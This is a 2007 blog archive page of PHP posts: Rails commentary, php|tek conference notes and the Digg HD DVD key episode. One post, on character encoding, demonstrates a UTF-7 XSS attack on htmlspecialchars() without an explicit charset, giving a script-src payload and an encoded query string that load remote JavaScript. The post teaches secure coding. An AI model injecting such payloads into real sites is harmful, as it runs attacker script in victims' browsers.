About the Author

Chris Shiflett

Hi, I’m Chris: entrepreneur, community leader, husband, and father. I live and work in Boulder, CO.


All posts for May 2007

Character Encoding and XSS

While lamenting Ronaldinho's red card and writing an overdue column for php|architect this weekend, I took a break to read Kevin Yank's latest post, Good and Bad PHP Code.

In the post, he provides a few useful PHP interview questions, including some questions from Yahoo as well as his personal favorite:

In your mind, what are the differences between good PHP code and bad PHP code?

He explains that good PHP code should be:

  • Structured
  • Consistent
  • Portable
  • Secure

He also takes an example of bad PHP code and makes it better, producing this:

<?php
 
if (isset($_GET['query'])) {
    echo '<p>Search results for query: ',
         htmlspecialchars($_GET['query'], ENT_QUOTES),
         '.</p>';
}
 
?>

In the comments, many additional improvements have been suggested, but there's one that has yet to be mentioned. When using htmlspecialchars() without specifying the character encoding, XSS attacks that use UTF-7 are possible. If you've been reading my blog for a while, you can probably put the pieces together yourself, so feel free to give it a go. The only obstacle is the fact that ENT_QUOTES causes all quotes to be escaped, and quotes are consistent between UTF-7 and ISO-8859-1, so you need an example exploit that doesn't use them:

<script src=http://shiflett.org/xss.js>

Web standards pedants might cringe, but this works in most browsers, despite the missing quotes, and the JavaScript returned by xss.js executes within the context of the current page.

To try this out, just save the example PHP code somewhere, then visit it with your browser, including the following value in the query string:

?query=%2BADw-script+src%2BAD0-http%3A%2F%2Fshiflett.org%2Fxss.js%2BAD4-

This only works in browsers that automatically detect the character encoding, but you can mimic the situation by manually setting your browser to use UTF-7 or by sending a Content-Type header that does the same thing:

<?php
 
header('Content-Type: text/html; charset=UTF-7');
 
?>

Terry Chay on Rails

Terry Chay's latest post is a work of art. This is why I read his blog. (If you're easily offended, you shouldn't.) He gives a quick slap in the face to those with more ego than intelligence (an issue highlighted by Jeremy Privett), then launches into a sarcastic, fact-filled tirade that cuts through some of the Rails hype:

Maybe if we work really hard at promoting ourselves, we can get a developer to create a site using PHP that will reach #700 on the Internet and fails so often that they've ruined the cuteness of cats.

To back up some of his commentary, he presents two graphs:

The first graph is used to put Twitter's success into perspective. Terry works at Tagged, so he uses that as an example PHP site and adds Facebook, because it's the heavyweight of that genre.

The second graph is a subtle reference to the reaction to Twitter's honest criticism of Rails. Terry asks:

Remind me, what is DHH doing lecturing Alex about scalability?

It's a rhetorical question, of course, because his graph clearly shows that Alex's web site receives far more traffic than anything ever developed by 37 Signals.

Terry makes another good point with this list:

  1. People like me are smart and have to run extremely large, scalable Internet infrastructures.
  2. People like me have used Rails.
  3. People like me don't use Rails to build extremely large, scalable Internet infrastructures.

I can think of several people who fit this description. In fact, I work for a technology-agnostic company that works on some of the largest web sites on the Internet. We have experience developing with Rails, and we have experience migrating from Rails to PHP. :-)

I'm sure Terry's post will be interpreted by many to be a criticism of Rails, but if anything, I think it's a criticism of the Rails community, similar to my post from early last year. Over time, Rails will certainly mature, but those of us who are interested in the technology (not the hype) would prefer to see the veil of perfection dropped in favor of progress. Terry hopes to see a new perspective adopted by the Rails community:

Maybe those people who build really large web sites daily have something to teach us.

Maybe they do.

Back from php|tek

php|tek was another well-organized event from the folks at php|architect. Just like my previous experience traveling to a conference, I arrived at JFK to discover that my flight had been cancelled. (This is becoming an unwelcome tradition.) A few more cancellations and delays later, and I was on my way to Chicago, albeit several hours late. Finding a place to stay turned out to be another fiasco, because I had a Seinfeld experience with my hotel reservation:

Jerry: I don't understand. I made a reservation. Do you have my reservation?

Agent: Yes, we do. Unfortunately, we ran out of cars.

Jerry: But the reservation keeps the car here. That's why you have the reservation.

Agent: I know why we have reservations.

Jerry: I don't think you do. If you did, I'd have a car. See, you know how to take the reservation, you just don't know how to hold the reservation. And that's really the most important part of the reservation, the holding.

In summary, traveling is a pain in the ass. Let's talk about the conference!

My hands-on talk was quite a challenge, because I was still sick (and thus had a difficult time speaking), and because there was no network availability in the room where I was presenting. I typically never rely on the network, but this talk was designed to let people exploit various security vulnerabilities. Luckily, a few people were able to follow along on their laptops, but given the circumstances, I should have given a different talk. I did receive some positive feedback, but I think people were just being nice. :-)

My other talk, The Truth about Sessions, was much better, and there was some good discussion at the end about various trending techniques. I put Nate on the spot (and on the hook) when I mentioned a CakePHP feature / component for trending. As an aside, if you live near Maryland or can afford to make the trip, Nate is giving a talk on Mon, 04 Jun 2007 at the June PHP Meetup at OmniTI:

CakePHP core developer Nate Abele will be presenting a case study on developing a component to enhance session security in your applications. This case study will touch on both how to secure your CakePHP applications, as well as reusable component design, and how to structure your code according to the CakePHP philosophy.

I had some parsekit questions I wanted to ask Sara while at the conference, but unfortunately, I never got the chance. In fact, I excused myself from most social activities, because I was trying to get well. As a result, I didn't get to spend much time chatting with friends. I did manage to participate in the podcast while I was there, and I'm surprised Sean managed to salvage so much content from that evening. :-) I also got to meet some people I've know for a while but have never met in person, such as Jeff Moore, Richard Lynch, and Caroline Maynard.

It was nice to see the ladies of PHPWomen.org wearing their stylish shirts. They were very well represented.

Although I didn't get to see it myself, I was happy to hear that Rasmus's talk included some of Jeremiah's research on JavaScript malware. There's no better security advocate in the PHP community than Rasmus. :-)

If you're looking for slides, Chris Cornutt of PHPDeveloper.org has been doing a great job collecting talks on his talks page.

In Chicago for php|tek

After a very long and eventful day filled with multiple cancellations, delays, and overbooked hotels, I'm finally in Chicago (well, Schaumburg) and ready for php|tek. I'm fighting a cold (and currently losing; the travel problems haven't helped), so I might be incognito Wednesday morning while I try to recover. I should be around before my talk at the end of the day Wednesday, and of course I'll be around for the remainder of the conference after that. If you're going to be here, please stop by and introduce yourself.

I'm giving two talks, and the one I'm most excited about is The Truth about Sessions. This talk is similar to one I gave a few years ago in Toronto, but this time it's better. :-) The talk focuses on teaching you exactly how sessions work, beginning with the very basics (HTTP, statelessness, etc.). I spend a bit of time talking about session security at the end, but if I do my job, you'll understand sessions well enough by that point to devise solutions to basic security problems yourself. It's definitely a teach a man to fish talk.

My other talk is called PHP Security by Example, and it's more hands-on. The time slot of one hour isn't enough to let you work through each of the exercises independently, but I have tried to structure the talk to make it easy to follow along, so bring your laptop.

By the way, if you're wondering why Sean is so excited about Andy McKee, check out the highest rated videos on YouTube. (He currently holds 3 of the top 6 slots.) His mastery of the guitar reminds me of Kaki King, and I'm sure it will be really cool to watch him play Thursday night.

Learning from Digg (DeCSS 2.0)

As I write this, Digg is offline after being overrun with stories about the HD DVD key that was recently leaked.

Why are such stories so popular? Primarily because the original story about the leak was removed, which itself was a reaction to recent threats by AACS LA, and these events have garnered widespread attention. Jay Adelson briefly explains the situation and asks for some cooperation:

We all need to work together to protect Digg from exposure to lawsuits that could very quickly shut us down.

Slashdot's story is unlikely to suffer the same fate, so many Digg users are questioning Digg's stance on this issue. To be fair, this has very little to do with Digg specifically, and I wish them the best of luck addressing the current situation.

The real issue is that the traditional notion of damage control doesn't really work in a world where information spreads so quickly. I have previously expressed concerns about mob mentality, and this situation is another lesson. Prior to the recent threats, most people didn't care whether they could write their own software to watch movies. (The key was leaked months ago.) This wasn't big news.

Now it's everywhere.

Is it just me, or is this DeCSS 2.0?